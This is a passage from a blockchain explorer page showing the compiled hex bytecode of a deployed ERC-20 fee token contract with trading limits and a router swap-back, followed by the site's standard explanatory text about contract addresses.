ffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611c5857600854811115611bfb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bf29061395a565b60405180910390fd5b600a54611c0783610d2b565b82611c129190613978565b1115611c53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c4a906139f5565b60405180910390fd5b611ded565b601c5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611cf55750601b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611d4457600854811115611d3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d3690613a83565b60405180910390fd5b611dec565b601b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611deb57600a54611d9e83610d2b565b82611da99190613978565b1115611dea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611de1906139f5565b60405180910390fd5b5b5b5b5b5f611df830610d2b565b90505f60095482101590505f818015611e1d5750600b60019054906101000a900460ff165b8015611e365750600660149054906101000a900460ff16155b8015611e895750601c5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015611edc5750601a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015611f2f5750601a5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f72576001600660146101000a81548160ff021916908315150217905550611f57612896565b5f600660146101000a81548160ff0219169083151502179055505b5f600660149054906101000a900460ff16159050601a5f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806120215750601a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561202a575f90505b5f5f9050811561229857601c5f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561208b57505f601254115b1561214b576120b860646120aa60125489612a9190919063ffffffff16565b612b0890919063ffffffff16565b9050601254601454826120cb91906133bd565b6120d59190613ace565b60175f8282546120e59190613978565b92505081905550601254601354826120fd91906133bd565b6121079190613ace565b60165f8282546121179190613978565b925050819055506012546015548261212f91906133bd565b6121399190613ace565b836121449190613978565b925061225f565b601c5f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156121a257505f600e54115b1561225e576121cf60646121c1600e5489612a9190919063ffffffff16565b612b0890919063ffffffff16565b9050600e54601054826121e291906133bd565b6121ec9190613ace565b60175f8282546121fc9190613978565b92505081905550600e54600f548261221491906133bd565b61221e9190613ace565b60165f82825461222e9190613978565b92505081905550600e546011548261224691906133bd565b6122509190613ace565b8361225b9190613978565b92505b5b5f8111156122735761227288308361260d565b5b5f831115612289576122883061dead8561260d565b5b808661229591906133fe565b95505b6122a388888861260d565b50505050505b505050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff160361231d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612314906136ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361238b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161238290613748565b60405180910390fd5b8260015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925856040516124659190613230565b60405180910390a3949350505050565b5f5f82846124839190613978565b9050838110156124c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124bf90613b48565b60405180910390fd5b8091505092915050565b6124fd307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461166a565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d7198230855f5f61dead426040518863ffffffff1660e01b815260040161256396959493929190613b9f565b60606040518083038185885af115801561257f573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906125a49190613bfe565b5050505050565b5f8383111582906125f2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125e99190613060565b60405180910390fd5b505f838561260091906133fe565b9050809150509392505050565b612618838383612b51565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612686576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161267d906137d6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036126f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126eb90613864565b60405180910390fd5b61275d81604051806060016040528060268152602001613f63602691395f5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546125ab9092919063ffffffff16565b5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506127ec815f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461247590919063ffffffff16565b5f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516128899190613230565b60405180910390a3505050565b5f6128a030610d2b565b90505f6016546017546128b39190613978565b90505f5f8314806128c357505f82145b156128d057505050612a8f565b60146009546128df91906133bd565b8311156128f85760146009546128f591906133bd565b92505b5f6002836017548661290a91906133bd565b6129149190613ace565b61291e9190613ace565b90505f6129348286612cf590919063ffffffff16565b90505f47905061294382612d3e565b5f6129578247612cf590919063ffffffff16565b90505f6129818761297360165485612a9190919063ffffffff16565b612b0890919063ffffffff16565b90505f818361299091906133fe565b90505f6017819055505f6016819055505f861180156129ae57505f81115b156129fb576129bd86826124d2565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb56185826017546040516129f293929190613c4e565b60405180910390a15b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051612a4090613cb0565b5f6040518083038185875af1925050503d805f8114612a7a576040519150601f19603f3d011682016040523d82523d5f602084013e612a7f565b606091505b5050809750505050505050505050505b565b5f5f8303612aa1575f9050612b02565b5f8284612aae91906133bd565b9050828482612abd9190613ace565b14612afd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612af490613d34565b60405180910390fd5b809150505b92915050565b5f612b4983836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612f71565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612bbf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612bb6906137d6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612c2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c2490613864565b60405180910390fd5b5f811015612c70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c6790613d9c565b60405180910390fd5b612cf08383601a5f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16612cc9575f612ceb565b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5b612fd2565b505050565b5f612d3683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506125ab565b905092915050565b5f600267ffffffffffffffff811115612d5a57612d59613dba565b5b604051908082528060200260200182016040528015612d885781602001602082028036833780820191505090505b50905030815f81518110612d9f57612d9e613de7565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612e42573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612e669190613e28565b81600181518110612e7a57612e79613de7565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612edf307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8461166a565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612f40959493929190613f0a565b5f604051808303815f87803b158015612f57575f5ffd5b505af1158015612f69573d5f5f3e3d5ffd5b505050505050565b5f5f83118290612fb7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612fae9190613060565b60405180910390fd5b505f8385612fc59190613ace565b9050809150509392505050565b5f8111612fe0576001612fe2565b5f5b60ff16600581905550505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61303282612ff0565b61303c8185612ffa565b935061304c81856020860161300a565b61305581613018565b840191505092915050565b5f6020820190508181035f8301526130788184613028565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6130ad82613084565b9050919050565b6130bd816130a3565b81146130c7575f5ffd5b50565b5f813590506130d8816130b4565b92915050565b5f819050919050565b6130f0816130de565b81146130fa575f5ffd5b50565b5f8135905061310b816130e7565b92915050565b5f5f6040838503121561312757613126613080565b5b5f613134858286016130ca565b9250506020613145858286016130fd565b9150509250929050565b5f8115159050919050565b6131638161314f565b82525050565b5f60208201905061317c5f83018461315a565b92915050565b5f6020828403121561319757613196613080565b5b5f6131a4848285016130ca565b91505092915050565b5f819050919050565b5f6131d06131cb6131c684613084565b6131ad565b613084565b9050919050565b5f6131e1826131b6565b9050919050565b5f6131f2826131d7565b9050919050565b613202816131e8565b82525050565b5f60208201905061321b5f8301846131f9565b92915050565b61322a816130de565b82525050565b5f6020820190506132435f830184613221565b92915050565b5f5f5f606084860312156132605761325f613080565b5b5f61326d868287016130ca565b935050602061327e868287016130ca565b925050604061328f868287016130fd565b9150509250925092565b5f60ff82169050919050565b6132ae81613299565b82525050565b5f6020820190506132c75f8301846132a5565b92915050565b6132d6816130a3565b82525050565b5f6020820190506132ef5f8301846132cd565b92915050565b5f5f6040838503121561330b5761330a613080565b5b5f613318858286016130ca565b9250506020613329858286016130ca565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061337757607f821691505b60208210810361338a57613389613333565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6133c7826130de565b91506133d2836130de565b92508282026133e0816130de565b915082820484148315176133f7576133f6613390565b5b5092915050565b5f613408826130de565b9150613413836130de565b925082820390508181111561342b5761342a613390565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613465602083612ffa565b915061347082613431565b602082019050919050565b5f6020820190508181035f83015261349281613459565b9050919050565b7f43616e2774207769746864726177206e617469766520746f6b656e73000000005f82015250565b5f6134cd601c83612ffa565b91506134d882613499565b602082019050919050565b5f6020820190508181035f8301526134fa816134c1565b9050919050565b5f8151905061350f816130e7565b92915050565b5f6020828403121561352a57613529613080565b5b5f61353784828501613501565b91505092915050565b5f6040820190506135535f8301856132cd565b6135606020830184613221565b9392505050565b6135708161314f565b811461357a575f5ffd5b50565b5f8151905061358b81613567565b92915050565b5f602082840312156135a6576135a5613080565b5b5f6135b38482850161357d565b91505092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f613616602683612ffa565b9150613621826135bc565b604082019050919050565b5f6020820190508181035f8301526136438161360a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6136a4602483612ffa565b91506136af8261364a565b604082019050919050565b5f6020820190508181035f8301526136d181613698565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613732602283612ffa565b915061373d826136d8565b604082019050919050565b5f6020820190508181035f83015261375f81613726565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6137c0602583612ffa565b91506137cb82613766565b604082019050919050565b5f6020820190508181035f8301526137ed816137b4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61384e602383612ffa565b9150613859826137f4565b604082019050919050565b5f6020820190508181035f83015261387b81613842565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f6138b6601683612ffa565b91506138c182613882565b602082019050919050565b5f6020820190508181035f8301526138e3816138aa565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613944603583612ffa565b915061394f826138ea565b604082019050919050565b5f6020820190508181035f83015261397181613938565b9050919050565b5f613982826130de565b915061398d836130de565b92508282019050808211156139a5576139a4613390565b5b92915050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f6139df601383612ffa565b91506139ea826139ab565b602082019050919050565b5f6020820190508181035f830152613a0c816139d3565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613a6d603683612ffa565b9150613a7882613a13565b604082019050919050565b5f6020820190508181035f830152613a9a81613a61565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f613ad8826130de565b9150613ae3836130de565b925082613af357613af2613aa1565b5b828204905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f613b32601b83612ffa565b9150613b3d82613afe565b602082019050919050565b5f6020820190508181035f830152613b5f81613b26565b9050919050565b5f819050919050565b5f613b89613b84613b7f84613b66565b6131ad565b6130de565b9050919050565b613b9981613b6f565b82525050565b5f60c082019050613bb25f8301896132cd565b613bbf6020830188613221565b613bcc6040830187613b90565b613bd96060830186613b90565b613be660808301856132cd565b613bf360a0830184613221565b979650505050505050565b5f5f5f60608486031215613c1557613c14613080565b5b5f613c2286828701613501565b9350506020613c3386828701613501565b9250506040613c4486828701613501565b9150509250925092565b5f606082019050613c615f830186613221565b613c6e6020830185613221565b613c7b6040830184613221565b949350505050565b5f81905092915050565b50565b5f613c9b5f83613c83565b9150613ca682613c8d565b5f82019050919050565b5f613cba82613c90565b9150819050919050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f613d1e602183612ffa565b9150613d2982613cc4565b604082019050919050565b5f6020820190508181035f830152613d4b81613d12565b9050919050565b7f45524332303a20696e76616c6964207472616e7366657220616d6f756e7400005f82015250565b5f613d86601e83612ffa565b9150613d9182613d52565b602082019050919050565b5f6020820190508181035f830152613db381613d7a565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050613e22816130b4565b92915050565b5f60208284031215613e3d57613e3c613080565b5b5f613e4a84828501613e14565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613e85816130a3565b82525050565b5f613e968383613e7c565b60208301905092915050565b5f602082019050919050565b5f613eb882613e53565b613ec28185613e5d565b9350613ecd83613e6d565b805f5b83811015613efd578151613ee48882613e8b565b9750613eef83613ea2565b925050600181019050613ed0565b5085935050505092915050565b5f60a082019050613f1d5f830188613221565b613f2a6020830187613b90565b8181036040830152613f3c8186613eae565b9050613f4b60608301856132cd565b613f586080830184613221565b969550505050505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122030ddd50ef1601cd8bf8f37d19042bc0c4b9fe2f66ece831138285e359ddc603864736f6c634300081c0033

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.